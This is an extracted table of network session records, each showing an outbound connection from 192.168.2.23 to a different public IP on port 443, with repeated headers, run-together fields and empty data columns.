                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22185192.168.2.2357492202.149.165.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22186192.168.2.234558871.240.127.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22187192.168.2.2358858188.234.35.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22188192.168.2.2350510163.167.148.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22189192.168.2.234607037.182.222.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22190192.168.2.2344408219.197.185.217443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22191192.168.2.236006449.153.58.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22192192.168.2.2343806142.30.154.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22193192.168.2.2346748150.44.6.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22194192.168.2.235699037.48.30.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22195192.168.2.2336440114.177.88.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22196192.168.2.2343554130.134.7.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22197192.168.2.2337368101.206.180.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22198192.168.2.233304840.159.171.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22199192.168.2.2349096199.57.112.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22200192.168.2.235618267.84.116.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22201192.168.2.2354766147.130.101.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22202192.168.2.233840482.119.223.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22203192.168.2.233333678.158.185.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22204192.168.2.2340854171.83.22.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22205192.168.2.233865891.220.92.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22206192.168.2.233898036.133.7.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22207192.168.2.235560053.210.226.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22208192.168.2.2358488194.226.130.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22209192.168.2.2341756135.130.40.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22210192.168.2.235292066.50.187.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22211192.168.2.2347572115.33.162.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22212192.168.2.235564447.169.104.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22213192.168.2.2352818210.56.61.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22214192.168.2.2350946147.80.207.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22215192.168.2.234070673.99.72.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22216192.168.2.233970642.201.187.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22217192.168.2.2339996139.246.222.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22218192.168.2.2344966119.154.229.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22219192.168.2.2355582133.114.187.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22220192.168.2.233753646.251.173.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22221192.168.2.234378813.115.30.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22222192.168.2.2338494117.58.16.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22223192.168.2.234503024.116.93.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22224192.168.2.2354938160.36.105.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22225192.168.2.233526825.214.33.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22226192.168.2.2358148187.35.73.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22227192.168.2.2360472158.135.243.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22228192.168.2.2355948141.179.246.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22229192.168.2.2350938119.242.138.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22230192.168.2.233379496.195.224.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22231192.168.2.233560420.137.178.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22232192.168.2.2354386205.81.136.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22233192.168.2.2334100131.101.114.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22234192.168.2.235386231.107.145.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22235192.168.2.236004851.71.220.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22236192.168.2.2354218122.41.3.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22237192.168.2.233335838.126.127.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22238192.168.2.2345864187.126.125.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22239192.168.2.2348110195.214.228.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22240192.168.2.2360346107.193.226.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22241192.168.2.234164488.217.166.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22242192.168.2.2360812213.105.67.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22243192.168.2.2335718118.28.58.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22244192.168.2.2351024167.103.110.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22245192.168.2.233812054.41.191.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22246192.168.2.2358628165.178.47.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22247192.168.2.235551449.125.153.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22248192.168.2.2344708141.95.35.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22249192.168.2.2347718193.251.75.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22250192.168.2.235639847.104.243.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22251192.168.2.233667871.26.50.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22252192.168.2.2339256176.71.36.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22253192.168.2.235357844.51.210.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22254192.168.2.2352558151.59.128.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22255192.168.2.2334390180.19.214.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22256192.168.2.2354800170.19.241.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22257192.168.2.2345890123.163.107.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22258192.168.2.2347120165.143.26.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22259192.168.2.235821691.195.214.255443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22260192.168.2.2346336219.224.117.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22261192.168.2.234067493.122.194.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22262192.168.2.2355924143.164.227.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22263192.168.2.2334206183.32.217.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22264192.168.2.2333156178.163.213.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22265192.168.2.2348096121.38.228.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22266192.168.2.23384142.128.233.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22267192.168.2.234600034.109.157.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22268192.168.2.2344586187.66.124.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22269192.168.2.2356834199.246.124.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22270192.168.2.2349518209.15.74.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22271192.168.2.2359556124.197.115.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22272192.168.2.236022035.161.69.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22273192.168.2.2352836117.134.134.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22274192.168.2.2353022122.178.6.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22275192.168.2.2344014112.221.185.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22276192.168.2.2342456184.60.45.181443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22277192.168.2.233949878.134.147.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22278192.168.2.2341218164.73.59.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22279192.168.2.235697060.36.16.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22280192.168.2.235305032.211.85.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22281192.168.2.235710444.112.10.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22282192.168.2.235381078.152.21.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22283192.168.2.233859431.170.152.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22284192.168.2.2343202111.190.213.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22285192.168.2.2337052131.25.227.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22286192.168.2.2335584121.164.57.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22287192.168.2.234272441.245.182.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22288192.168.2.2357810148.141.64.160443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22289192.168.2.235489683.164.179.121443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22290192.168.2.2354082160.36.43.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22291192.168.2.235597212.118.192.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22292192.168.2.234111644.207.126.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22293192.168.2.235592862.62.131.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22294192.168.2.234374059.23.10.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22295192.168.2.2332930159.242.32.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22296192.168.2.234342858.157.162.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22297192.168.2.2358986202.198.226.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22298192.168.2.234062812.30.92.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22299192.168.2.233320035.153.174.13443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22300192.168.2.2348076169.179.109.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22301192.168.2.2357468126.71.193.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22302192.168.2.235027839.89.57.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22303192.168.2.2356120104.112.51.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22304192.168.2.2342992157.237.137.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22305192.168.2.2337578172.82.43.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22306192.168.2.2345900205.241.241.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22307192.168.2.233924293.154.16.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22308192.168.2.234492679.111.25.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22309192.168.2.2357802185.183.150.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22310192.168.2.2352806158.6.225.122443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22311192.168.2.2355932101.133.102.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22312192.168.2.2357984165.5.89.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22313192.168.2.233431442.141.7.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22314192.168.2.2346544184.224.113.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22315192.168.2.2354860101.71.151.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22316192.168.2.233437244.39.230.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22317192.168.2.2337452119.207.103.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22318192.168.2.235423895.56.197.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22319192.168.2.234335841.236.56.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22320192.168.2.234632283.46.73.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22321192.168.2.236089019.138.211.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22322192.168.2.236084027.47.241.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22323192.168.2.2336032192.52.144.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22324192.168.2.2347042177.132.83.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22325192.168.2.233520478.12.77.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22326192.168.2.2348946220.99.253.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22327192.168.2.2350512166.130.165.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22328192.168.2.2349226102.220.15.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22329192.168.2.2343732155.159.37.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22330192.168.2.2340858138.132.109.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22331192.168.2.236061498.2.90.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22332192.168.2.2347762202.154.235.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22333192.168.2.2356542129.215.255.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22334192.168.2.2342770186.253.62.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22335192.168.2.2348472153.19.183.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22336192.168.2.2346584210.230.177.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22337192.168.2.2347172188.4.230.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22338192.168.2.2356138112.2.236.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22339192.168.2.234423677.95.134.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22340192.168.2.235559669.89.211.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22341192.168.2.2336596200.225.163.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22342192.168.2.2352126163.139.57.230443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22343192.168.2.234396042.40.164.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22344192.168.2.2353540111.60.23.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22345192.168.2.23498142.239.195.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22346192.168.2.2351360181.21.176.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22347192.168.2.234535898.6.200.92443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22348192.168.2.234963289.157.21.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22349192.168.2.235427650.4.141.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22350192.168.2.2333742150.95.90.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22351192.168.2.2335204218.43.171.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22352192.168.2.2355842223.201.253.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22353192.168.2.2341056128.128.218.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22354192.168.2.23451601.187.126.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22355192.168.2.235942861.21.108.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22356192.168.2.2353666192.106.17.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22357192.168.2.235534452.61.85.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22358192.168.2.23467528.68.56.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22359192.168.2.2334006162.213.218.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22360192.168.2.2342212169.221.138.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22361192.168.2.23371841.253.163.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22362192.168.2.2341656132.40.202.118443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22363192.168.2.234929612.46.39.196443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22364192.168.2.2359098115.62.95.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22365192.168.2.234435069.144.254.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22366192.168.2.2356394195.10.20.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22367192.168.2.23595145.29.246.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22368192.168.2.235300263.231.32.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22369192.168.2.2333128134.106.109.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22370192.168.2.2334072138.147.58.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22371192.168.2.2334218191.36.135.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22372192.168.2.236075823.37.81.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22373192.168.2.235250837.81.91.250443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22374192.168.2.2344270175.114.233.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22375192.168.2.2342548165.153.230.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22376192.168.2.233371236.181.121.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22377192.168.2.2346892139.97.151.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22378192.168.2.23390909.51.5.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22379192.168.2.236048291.48.62.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22380192.168.2.2356566114.160.122.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22381192.168.2.2337990205.220.232.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22382192.168.2.2345776112.176.166.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22383192.168.2.2351036220.24.207.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22384192.168.2.2333124146.77.153.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22385192.168.2.235043076.164.70.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22386192.168.2.2347610175.223.180.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22387192.168.2.23461925.172.214.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22388192.168.2.2333872123.146.48.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22389192.168.2.2337818108.24.59.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22390192.168.2.2345662161.181.113.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22391192.168.2.2344674174.192.46.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22392192.168.2.2353468112.97.25.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22393192.168.2.235282840.57.12.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22394192.168.2.2355730199.19.193.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22395192.168.2.2351498164.51.49.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22396192.168.2.2341258180.219.102.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22397192.168.2.2353814208.72.248.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22398192.168.2.2344224186.69.155.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22399192.168.2.234020039.169.25.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22400192.168.2.233834679.162.21.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22401192.168.2.2357590128.162.50.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22402192.168.2.2337402106.20.111.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22403192.168.2.234109296.133.216.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22404192.168.2.2341874117.228.150.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22405192.168.2.234472442.145.207.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          22406192.168.2.233311834.198.55.150443
